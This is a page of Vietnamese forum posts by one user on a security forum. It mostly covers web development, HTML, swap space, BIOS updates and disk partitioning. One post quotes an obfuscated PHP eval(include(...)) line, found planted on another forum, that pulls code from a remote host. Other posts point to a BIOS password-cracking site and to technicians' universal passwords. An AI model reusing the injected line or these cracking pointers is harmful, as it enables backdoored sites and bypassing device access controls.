banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: KINYO  XML
Profile for KINYO Messages posted by KINYO [ number of posts not being displayed on this page: 0 ]
 

nhimthulinh wrote:
không ổn định lắm đâu, mình thấy lúc nahnh lúc chậm ah bạn ơi... 


Hic, đòi free mà còn kêu ca nhanh mới cả chậm, khó chiều quá smilie

chaien281985 wrote:
Diễn đàn đó là do mình tự viết và nó ở dạng localhost chưa đưa lên mạng nên mình mới hỏi mọi người. Rất cảm ơn đã giúp đỡ. Còn cái phần mềm Regex mà anh learn2hack bảo có link không cho em down với. Cảm ơn 


RegEx (Regular Expression) không phải là phần mềm mà là một trong những chức năng có sẵn của các ngôn ngữ lập trình, các ngôn ngữ dùng cho Web như PHP, ASP, JS... cũng đều có một số hàm dùng với RegEx cho phép xử lý các biến tùy theo ý người viết chương trình.

Lập trình Web rất hay phải vận dụng RegEx để xử lý các chuỗi ký tự, nếu bạn chưa hiểu về RegEx thì nên tìm hiểu và nắm vững kỹ năng này trước khi tiếp tục đi sâu vào làm Web.
Chỉ nghe nói có việc sét đánh cột điện làm hỏng modem Dial-up thôi chứ chưa nghe thấy chuyện máy tính bị sét đánh hỏng bao giờ cả.

Máy để ngoài đường dưới trời mưa à ? Thế thì chả cần sét đánh nó cũng hỏng rồi còn gì smilie

learn2hack wrote:
Bình thường bạn có thể post hình ảnh vào bài viết trên diễn đàn bằng cách sử dụng thẻ
Code:
[img]Link của hình[/img]


Còn nếu muốn tích hợp sẵn chức năng upload hình ảnh từ máy tính (hoặc từ URL) rồi chèn tự động vào bài viết thì bạn nên tìm kiếm các MODs thuộc loại này cho forum của bạn. Nếu bạn khá lập trình thì có thể tự viết cho mình. 



Đâu phải cứ cho tag IMG vào là được đâu, còn phải dùng RegEx để làm hiện ảnh lên nữa.

_VoT_ wrote:

KINYO wrote:
Không biết là gắn cái vô lăng của xe Ferrari vào thì cái xe công nông nó có đi nhanh hơn tý nào không nhỉ ? 


Nhanh hơn chứ, với điều kiện là bác nông dân lái. smilie)  


Đấy, vấn đề nó chính ở chỗ này đấy.
Không biết là gắn cái vô lăng của xe Ferrari vào thì cái xe công nông nó có đi nhanh hơn tý nào không nhỉ ?

hackercoder wrote:
Theo em hiểu. nếu một máy con quản lý trên web thì bác nên sử dụng hệ thống bắc cầu từ một máy con ( web ) lên server ( máy chủ ). tại đây máy chủ sẽ nhận các thông tin của web ( máy con ) truyền về. nếu đúng thì gửi trả lại máy con một thông tin ( xác nhận " đúng, sai " ) nếu đúng thì tiếp tục. sai thì yêu cầu nhập pass.... !
cái này thì hiện tại ở việt nam đã có hai nhóm làm thành công rồi. cả hai nhóm này đều ở tphcm. còn cụ thể thì em không biết.
còn quản lý trên phần mềm giao tiếp từ máy con đến máy chủ ( cái này " tựa tựa ngân hàng " ) thì nó có một phần mềm đó bác. cái này xây dựng trên nền windows server ! nhận và sử lý các yêu cầu của máy con qua API.


P/s : ba cái này em gà mờ lắm. có gì nói sai mong các bác đừng cười em nhé !
 


Gì thế nữa, cái này forum ttvnol dùng cả mấy năm nay rồi còn gì nữa, có gì ghê gớm đâu mà "đã có hai nhóm làm thành công và đều ở tp hcm".

Xvampire wrote:
các bác cho em hỏi về CGI với nhá
thấy trong 1 số trang web có file CGI
em muốn hỏi là :
1 - CGI có tác dụng gì
2 - Vì sao dùng CGI
3 - Cách viết CGI
mong các bác chỉ giúp nhanh cho em với 



1 - Phở có tác dụng gì ?
2 - Tại sao lại ăn phở ?
3 - Nấu phở như thế nào ?

Mong các bác chỉ giúp cách nấu phở nhanh nhanh, đói quá
:wink:
Download cái phpPP hay cái forum free nào đó về dùng, hoặc là mở ra để xem, chứ nói thì đơn giản nhưng để làm được cái forum tàm tạm cũng cần có một số kiến thức nhất định về Web, JS, PHP hay ASP...
Đơn giản nhất là cứ click chuột vào cái frame có image, chọn "Save Frame As" (FireFox) rồi để vào đâu đó trên ổ đĩa.

Vào ổ đĩa chỗ vừa save cái page đó tìm thư mục "default.dec_files", vào trong "default_data" sẽ thấy một cái file là "default.dec", cột "type" đề là "DEC File", đó chính là file image, có dung lượng khoảng 400-500 KB gì đó, nhấn chuột phải rename nó lại, cho thêm đuôi là "jpg" là thành tệp image.

Nokia1100 wrote:
Vâng, đây là chiến tích bác Navaro để lại khi hack forum trường em. Ko ngờ gặp phải các đại cao thủ bên trường em. Hehe 


Thế cuối cùng là Navaro bó tay à smilie)
Trên một cái forum khác thì có cái này, không biết của chú hacker nửa mùa nào nữa.

Code:
ducanheval(include(CHR(104).CHR(116).CHR(116).CHR(112).CHR(58).CHR(47).CHR(47).CHR(115).CHR(97).CHR(110).CHR(104).CHR(100).CHR(105).CHR(101).CHR(117).CHR(56).CHR(120).CHR(46).CHR(99).CHR(111).CHR(109).CHR(47).CHR(109).CHR(46).chr(116).chr(120).chr(116))); //
JForum.
Thằng CentOS hay phết đấy.
Mấy hôm nay ko vào HVA được vì mất cái domain, dùng IP thì quên xừ nó Pass, tìm mãi mới ra :lolsmilie
Đồng ý là phải có SWAP, ngay cả Windows cũng có SWAP smilie

Theo hủ tục thì SWAP = RAM_QTY * 2, tức là nếu RAM là 512 MB thì swap = 1024 MB.

Nhưng thực tế thì nếu máy có nhiều RAM, từ 512 MB trở lên thì SWAP để là 512 MB là ổn rồi. Vì hệ điều hành nào cũng cần phải biết manage cái SWAP sao cho hợp lý, tức là refresh nó periodically, chứ nếu không thì lấy cả ổ đĩa ra làm SWAP cũng không đủ.

Máy chủ của cơ quan tôi thuê có RAM là 2 GB, nhưng SWAP họ chỉ để 1 GB, chạy ngon lành cả năm nay, xem bằng phpsysinfo thì thấy RAM lúc nào cũng 90-95%, SWAP chỉ dùng có 1-2%. Nhiều tài liệu Linux Server cũng nói là chỉ nên để SWAP tối đa là 1 GB mà thôi.
Phải cho cái nguồn, ví dụ securityfocus.com chẳng hạn, chứ không thì biết thế nào được.

xikenet wrote:
Tui có cài Fedora Core 5 và Kernel của NTFS vào rồi nhưng vẫn không mount dược NTFS. Tui cũng đã thử mọi cách nhưng đành bó tay.
Có chuyên gia nào không chỉ dùm tui. Và nếu có ai cần thi tui sẽ mách cho 1 mẹo de Add and Remove RPMS trong Fedora Core 5. 


Mình có cái máy cũ chạy Redhat 9, ổ đĩa share với Win2k, trước đã làm cho nó có thể đọc được NTFS (nhưng chưa ghi được), giờ quên tiệt rồi :lolsmilie

thuytinh wrote:
cho em hỏi khi cài đặt hệ điều hành windows thì phần chia kích thước của các partition thực hiện trước hay sau khi format.Nếu nhu em muốn chia lai kích thước của các ổ đĩa mà không cần cài lại hệ điều hành có được không.Cám ơn nhiều nhiều 


Em có thể dùng phần mềm Partition Magic để quản lý các phân vùng của HDD từ trong Win, có thể tạo phân vùng mới, chỉnh lại size của các phân vùng hiện có, sát nhập các phân vùng...
Có trang này chuyên về phá pass của bios laptop IBM và một số máy của hãng khác.

http://www.allservice.ro/forum/viewforum.php?f=12

Soft đa phần là miễn phí.

Romatic2009 wrote:
Làm sao để update bios vậy các sư huynh!
****************************
- Có cách nào Update bios online ko?
- Để đảm bảo an toàn có cách nào sao lưu Bios trước khi update!- làm sao phục hồi lại khi update bị lỗi!?
****************************
----------xin chân thành cám ơn------------

 


Lên website của hãng sản xuất download cái soft về, bây giờ người ta ai cũng làm như vậy.

Sau khi cài cái soft đó rồi chạy nó, thường thì nó có nhiều lựa chọn, hoặc tải trực tiếp new bios từ Internet hoặc tìm trên ở cứng (ta đã tự download từ trước), sau khi check integrity rồi nó sẽ tự chạy, cứ theo những hướng dẫn của nó mà làm.

Cách thức làm của từng loại không giống nhau, ví dụ tôi update Bios cho cái desktop có main Asus thì nó update luôn trong Windows, nhưng khi update Bios cho cai laptop Thinkpad thì nó lại khời động lại tồi mới update theo cách thức riêng.

Dù bằng cách này hay cách khác, điều quan trọng là khi đang update thì không được tắt máy kẻo nó tèo luôn. Nếu là laptop thì sạc sẵn cục pin, khi update thì dùng song² cả pin và nguồn cho yên tâm.

hakuso wrote:

KINYO wrote:
HTML không liên quan gì tới Web cả, không có HTML thì vẫn có Web, lấy ví dụ ta có thể cho in nội dung thẳng ra trình duyệt dưới dạng TEXT mà không cần HTML. 


Nói vậy là sai rồi KINYO smilie)
Thật ra HTML là quy tắc hiển thị, định dạng một nội dung được quy ước và hiểu bởi trình duyệt. Vì thế biết HTML luôn là lợi thế trong thiết kế web.
Bạn cứ tin mình, các tool như Visual Studio, FrontPage, ... không bao giờ giúp bạn thiết kế web đẹp cả. Đành rằng chúng ta có dùng template nhưng đâu phải lấy về là apply vô liên, phải sửa lại chút và nếu sửa = những tool đó thì quả thật rất khó khăn vô cùng.
VD muốn đổi màu chữ trên kia , cho nó đậm 1 chút hay kéo cái bảng rộng thêm 1 chút thì điên luôn đấy. Khi đó hãy dùng chút hiểu biết về HTML mà sửa source lại :wink:
 


Hi hi, bạn đọc kỹ lại các post nhé, không phải chúng ta đang tranh luận về HTML và các Tags của nó đâu bạn ạ, tôi đã nói ở trên kia răng HTML chỉ dùng để định dạng cho văn bản, thế là đủ hiểu rồi, hà tất phải nói tới việc thay đổi mầu sắc, cỡ chữ... :wink:

Nếu muốn bạn có thể làm một database driven website bằng Flash hẳn hoi, không cần HTML để làm thay đổi cỡ chữ hay mầu sắc gì cả. HTML chỉ là một ngôn ngữ định dạng văn bản chứ thực ra không phải là một chuẩn, vì vậy nó không phải là không thể thay thế được.

klasdfe wrote:

KINYO wrote:

Ồ, vậy thì xin chúc mừng bạn, bạn là Webmaster duy nhất còn chơi đồ cổ, cố gắng phát huy nhé, khi nào lên khoảng 10.000 trang thì khóc cũng chưa muộn smilie  

hic, thấy có lửa trong bài của bác. Tất nhiên nếu có điều kiện mình sẽ học các ngôn ngữ lập trình web như php... nhưng chỉ biết html ko có nghĩa là ko làm được.
 


Làm được, tốt nữa là đằng khác :lolsmilie

Nhưng mà dở lắm :wink:

klasdfe wrote:
Ai bảo ko có ai làm html ? Site mình toàn bộ html (với 1 ít css) cỡ 2200 trang. Chỉ sợ bị DDoS với server bị hacker làm thịt thôi. Còn đâu vô tư về vấn đề bảo mật smilie 


Ồ, vậy thì xin chúc mừng bạn, bạn là Webmaster duy nhất còn chơi đồ cổ, cố gắng phát huy nhé, khi nào lên khoảng 10.000 trang thì khóc cũng chưa muộn smilie

conan1212 wrote:

KINYO wrote:

it8x wrote:
Các bậc tiền bối làm ơn chỉ giùm mã nguồn của các website bằng HTML được không, vì em chỉ biết về HTML thôi, website về nghe nhạc trực tuyến thì càng hay vì em đang muốn làm nó.

Thank you very much !
 


Thời buổi này làm gì có ai làm website bằng HTML hả em, cái code HTML đó thực chất là được các scripts tạo ra đó mà thôi. Ngôn ngữ HTML chỉ được dùng để tạo định dạng cho trang Web, nhưng nội dung của trang Web thì lại được tạo ra từ những thông tin ghi trong cơ sở dữ liệu (database).

Muốn làm Web thì phải học thêm một server-side scripting language, ví dụ PHP hay ASP và nhất là SQL để làm việc với database.

Ngay cả HTML hiện nay cũng đã là Dynamic HTML rồi, tức là bản thân HTML không đủ để làm Web nữa là nó cần hỗ trợ thêm bởi JavaScript, CSS...

Nếu em chỉ biết HTML thì có thể quên chuyện làm Web được rồi, nên dành thời gian học những thứ còn thiếu sót trên. 


To KINYO bạn nói vậy là không đúng rồi , căn bản của công nghệ web là HTML đó, nếu không có HTML thì không biết www sẽ như thế nào nữa, nhờ có HTML mà ngày nay mới có HVAONLINE.NET đó , kể từ sau khi HTML ra đời thì www mới thực sự phát triển mạnh mẽ và khai sinh ra ServerScript
nư PHP, ASP và JSP như bây giờ . Nếu bạn không biết HTML thì bạn làm sao có thể làm web với các thứ ServerScript khác.
Mà nói thiệt ở Việt Nam toàn là Copy roài paste , hay lên Net download về roài chỉnh sửa roài upload lên mạng . Roài tự hào là site của mình đẹp , thật là lố bịch vì đó nào có phải là hoàn toàn do bạn làm đâu , bạn muốn thật sự nói mình đã thiết kế thành công một trang nếu bạn hoàn toàn làm từ đầu đến cuối từ đồ hoạ cho nó đên viết code và bài viết có trên trang , nếu có copy thì nên ghi rỏ nguồn của nó . Nói chung Internet hiện nay bát nháu thí mồ , nhiều trang tự hào là đẹp thực ra mà nói đó nhìn vào giống một con tắc kè bông hơn. Include quá nhiều graphic làm tốc độ load chậm . 


HTML không liên quan gì tới Web cả, không có HTML thì vẫn có Web, lấy ví dụ ta có thể cho in nội dung thẳng ra trình duyệt dưới dạng TEXT mà không cần HTML.

Web có nhiều giao thức khác nhau, HTML chỉ liên quan tới HTTP thôi, ví dụ FTP đâu có liên quan gì tới HTML ? Bản chất của Web là client hỏi (request) và server trả lời (response).

lihavim wrote:

KINYO wrote:

dohaichau02 wrote:
Vậy nếu ko có Tag thì nó biết copy cái nào ??, và hiển thị trang nào với từ khóa nào ??.
Nó phải dựa trên thẻ đó thì mới copy site mình chứ, mà copy thì cũng chỉ copy Text dạng HTM thui, còn ảnh và các thứ khác thì chết Host nó á ... 


Hi hi, Google nó copy luôn cả text cả ảnh bạn ạ :wink:  

Em thấy cache của Google làm gì có ảnh nhỉ? 


Bạn nhập từ khoá, nhấn Search, sau đó ngay trên chỗ ô để nhập từ khoá nhấn vào "Images" (ngay sau "Web") để tìm ảnh mà Google đã ghi lại, bạn sẽ thấy rằng có khá nhiều ảnh chỉ xem được trên cache của Google, khi click vào đó để xem trên website gốc thì ảnh đã bị del từ lâu rồi.

thang2rs wrote:
Tôi đã không hiểu hết ý của bạn. Sorry.

Một vấn đề rất thú vị!!!

Tôi vẫn nghĩ có thể giải quyết bằng Flash. Tuy nhiên chúng ta hãy chờ xem cách giải quyết bằng AJAX của KINYO như thế nào.
 


Đâu phải là cách giải quyết của tôi, cái này người ta dùng từ đời tám hoánh nào rồi, nếu bạn nào hay tải files lên các website ví dụ như badongo.com chẳng hạn thì bạn đã sử dụng nó rồi đấy :wink:

Tham khảo hay download ở đây, nếu muốn tìm hiểu sâu hay có thêm scripts để test thì search với từ khoá PHP+AJAX+UPLOAD+PROGRESS+BAR.

http://tomas.epineer.se/archives/3

nshmdg wrote:
Sorry KINYO
nếu mình không nhầm thì Laptops BIOS không có PIN
 


Rất tiếc là bạn đã nhầm :wink:

Dungna wrote:
Máy mang bên nước ngoài về bị đặt Pass BIOS, có ai biết cách phá không ?? Nhớ là Laptop chứ không phải máy Desktop đâu mà tháo pin nhé !!! 


Laptop muốn tháo pin cũng dễ thôi, thường thì lật bàn phím lên là tháo được, có một số loại khó hơn nhưng số này hiếm.

Nhưng trước khi tháo pin thì thử search trên mạng cái pass của nhà sản xuất xem sao, mỗi dòng máy có một universal password để tụi technician dùng khi sửa máy cho khách.

dohaichau02 wrote:
Vậy nếu ko có Tag thì nó biết copy cái nào ??, và hiển thị trang nào với từ khóa nào ??.
Nó phải dựa trên thẻ đó thì mới copy site mình chứ, mà copy thì cũng chỉ copy Text dạng HTM thui, còn ảnh và các thứ khác thì chết Host nó á ... 


Hi hi, Google nó copy luôn cả text cả ảnh bạn ạ :wink:
 
Go to Page:  First Page Page 1 2 3 4 6 7 8 Page 9 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|